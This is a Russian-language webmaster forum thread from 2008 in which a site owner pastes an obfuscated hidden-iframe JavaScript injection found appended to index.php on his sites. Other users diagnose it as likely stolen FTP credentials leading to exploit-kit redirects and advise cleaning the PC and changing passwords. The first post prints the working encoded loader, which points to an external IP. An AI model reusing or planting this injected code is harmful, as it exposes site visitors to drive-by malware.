АРМАДА
Хакерский модуль
На страницу 1, 2  След.
Новая тема Написать ответ

m_Stasuk
Дизайнер
Зарегистрирован: 23.12.2007
Сообщений: 5967
Contest (Сумма: 2)
Обратиться по нику
# Добавлено:Пн Янв 28, 2008 8:25 pmДобавить в избранноеОтветить с цитатой
Привет!

У меня такая история, взял хостинг к которому можно прикрутить 5 доменов.

4 сайта не вордпресе, один сайт на движке, который писал один знакомый.

Короче обнаружил на всех сайтах вот такую запись

Код:
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v479c9fa343af2(v479c9fa343efc){ function v479c9fa3442e5 () {return 16;} return(parseInt(v479c9fa343efc,v479c9fa3442e5()));}function v479c9fa344af0(v479c9fa344eea){ function v479c9fa345b0a () {return 2;} var v479c9fa3452fe='';for(v479c9fa3456f8=0; v479c9fa3456f8<v479c9fa344eea.length; v479c9fa3456f8+=v479c9fa345b0a()){ v479c9fa3452fe+=(String.fromCharCode(v479c9fa343af2(v479c9fa344eea.substr(v479c9fa3456f8, v479c9fa345b0a()))));}return v479c9fa3452fe;} document.write(v479c9fa344af0('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3037663863207372633D­5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3531383837292B27653437626563313466625C27207769647­4683D353833206865696768743D3839207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>



Эта запись стоит в исходном коде в самом низу. Кто подскажет что это и как бороться.
Написал в сапорт хостинга, там сказали типа разбирайтесь сами.

пример сайта _photoles.ru могу все написать, но думаю ни к чему.

m_Stasuk
Дизайнер
Зарегистрирован: 23.12.2007
Сообщений: 5967
Contest (Сумма: 2)
Обратиться по нику
# Добавлено:Пн Янв 28, 2008 8:28 pmОтветить с цитатой
да и еще, как я понял это модуль, который перенаправляет моих посетителей, точнее не перенаправляет, а накручивает моих посетителей на счетчик других сайтов. Можно как-то понять каких? Я так понимаю что какой-то сеошник кидает какого-то рекламодателе через меня. Хотел бы короче узнать кто это и :rr6: r5 bums этого чувака. Если конечно он в пределах досягаемости.
Зарабатываю на рускамзе
Ростов-на-Дону

m_Stasuk
Дизайнер
Зарегистрирован: 23.12.2007
Сообщений: 5967
Contest (Сумма: 2)
Обратиться по нику
# Добавлено:Пн Янв 28, 2008 9:46 pmОтветить с цитатой
реально эту дуру видит только каспер. Если у кого-то каспер, то посмотрите плиз как называется вирус
Зарабатываю на рускамзе
Ростов-на-Дону

m_Stasuk
Дизайнер
Зарегистрирован: 23.12.2007
Сообщений: 5967
Contest (Сумма: 2)
Обратиться по нику
# Добавлено:Пн Янв 28, 2008 11:02 pmОтветить с цитатой
В кратце:
заражает файл index.php, расположенный в корневой директории сайта, путём дописывания в его конец вредоносного? javascript кода....
Делает это предположительно в автоматическом режиме...

такой троян гремел год назад у agava.ru

заражает файлы index.php
Зарабатываю на рускамзе
Ростов-на-Дону

m_Stasuk
Дизайнер
Зарегистрирован: 23.12.2007
Сообщений: 5967
Contest (Сумма: 2)
Обратиться по нику
# Добавлено:Пн Янв 28, 2008 11:03 pmОтветить с цитатой
сам с собой поговорил Laughing
Зарабатываю на рускамзе
Ростов-на-Дону

Жека
V.I.P.
Зарегистрирован: 07.12.2005
Сообщений: 2171
Обратиться по нику
# Добавлено:Вт Янв 29, 2008 2:08 amОтветить с цитатой
1) чистить свой комп, вполне вероятно, что доступ к сайту был получен трояном через ваш комп
2) после чистки домашнего компа менять пароли от хостинга (обязательно от фтп, желательно от http панели), либо поменять пароли с другого компа
3) удалить эту хрень на индексных страницах

ps менять пароли без чистки своего компа бесмысленно - появится опять.
Подпись

Li-Hua
Чинамэн
Зарегистрирован: 25.12.2005
Сообщений: 11547
Обратиться по нику
# Добавлено:Вт Янв 29, 2008 7:09 amОтветить с цитатой
m_Stasuk, у тебя от фтп пассы увели и ифрейм поставляли или ты сателлиты купил готовые такие? я не понял из первого поста

m_Stasuk
Дизайнер
Зарегистрирован: 23.12.2007
Сообщений: 5967
Contest (Сумма: 2)
Обратиться по нику
# Добавлено:Вт Янв 29, 2008 9:34 amОтветить с цитатой
я не знаю как получилось. Все 5 сайтов делал я сам. Похоже что меня ломанули все же.
Зарабатываю на рускамзе
Ростов-на-Дону

Li-Hua
Чинамэн
Зарегистрирован: 25.12.2005
Сообщений: 11547
Обратиться по нику
# Добавлено:Вт Янв 29, 2008 10:27 amОтветить с цитатой
Ну тогда тебя или хостинг ломанули, меняй пассы, апдейти ВП, проверь свой комп.

agrasoff
Опытный
Зарегистрирован: 08.12.2007
Сообщений: 106
Обратиться по нику
# Добавлено:Ср Фев 06, 2008 12:25 amОтветить с цитатой
Жека писал(а):
1) чистить свой комп, вполне вероятно, что доступ к сайту был получен трояном через ваш комп
2) после чистки домашнего компа менять пароли от хостинга (обязательно от фтп, желательно от http панели), либо поменять пароли с другого компа
3) удалить эту хрень на индексных страницах

ps менять пароли без чистки своего компа бесмысленно - появится опять.

да, самое частое - это ftp-аккаунты у тебя берут, которые локально на твоем компе хранятся.. и все действия, которые жека перечислил очень ценные :)

а чем ты пользуешься для работы с ftp? интересно просто. вот в total commander'e пароли в открытом виде хранятся. поэтому их очень
легко оттуда взять и попользовать.
Хостинг в US. Budget, Business, Dedicated. 375 GB за $3 в месяц.

m_Stasuk
Дизайнер
Зарегистрирован: 23.12.2007
Сообщений: 5967
Contest (Сумма: 2)
Обратиться по нику
# Добавлено:Вс Май 04, 2008 10:57 pmОтветить с цитатой
короче этот модуль отравлял мне жизнь все это время. r5

сейчас нашли решение. Файлу index.php поставили атрибуты 444. Это скорее всего должно искоренить проблему.
Зарабатываю на рускамзе
Ростов-на-Дону

Dmitr
Профессионал
Зарегистрирован: 23.04.2007
Сообщений: 926
Обратиться по нику
# Добавлено:Вс Май 04, 2008 11:07 pmОтветить с цитатой
только там ничего не накручивается, там на сплойты на сплойты всё ...

а если уж антивирь ворчит, то слова мои подтверждает. по сути Жека отписал элементарно что сделать.

densa
Гуру
Зарегистрирован: 27.06.2006
Сообщений: 1018
Обратиться по нику
# Добавлено:Пн Май 05, 2008 9:32 pmОтветить с цитатой
скорее всего у тебя пароли от фтп увели. Если так то хоть какие права поставь, переписать его всеравно можно будет. Работай над защитой своего компа
Узнай как отдохнуть в Таиланде самостоятельно
Я болею за Ермак

m_Stasuk
Дизайнер
Зарегистрирован: 23.12.2007
Сообщений: 5967
Contest (Сумма: 2)
Обратиться по нику
# Добавлено:Вт Май 06, 2008 8:57 pmОтветить с цитатой
то что Жека написал я делал 500 000 миллионов раз. Не помогло.
Чищу комп, меняю пароли, но через время модуль появляется опять.

Сейчас пока затишье.
Зарабатываю на рускамзе
Ростов-на-Дону

IseeDeadPeople
Объединенная Электрическая
Зарегистрирован: 06.12.2005
Сообщений: 18000
Обратиться по нику
# Добавлено:Пт Май 16, 2008 4:58 pmОтветить с цитатой
а.. лала.. пам пам.. тум тум..
а бывает в наших краях... лам лам пам пам...
когда даже платный хостер.. ла ла пам пам

.......... на всем своем .. машинке ... ла ла пам пам СТАВИТ НА НЕКОТОРОЕ ВРЕМЯ .. ла ла пам пам ТИПА ИФР#ЙМ какого нить троя как АДДОН РЕВРИТЕР НА ВЕСЬ ВЫВОД ХТМЛ контента с машинке..
пали что за хостер Smile
http://m.lsl.com/
Новая тема Написать ответ    ГЛАВНАЯ ~ АНТИЧИТ

Перейти:  





Генеральный спонсор



Партнеры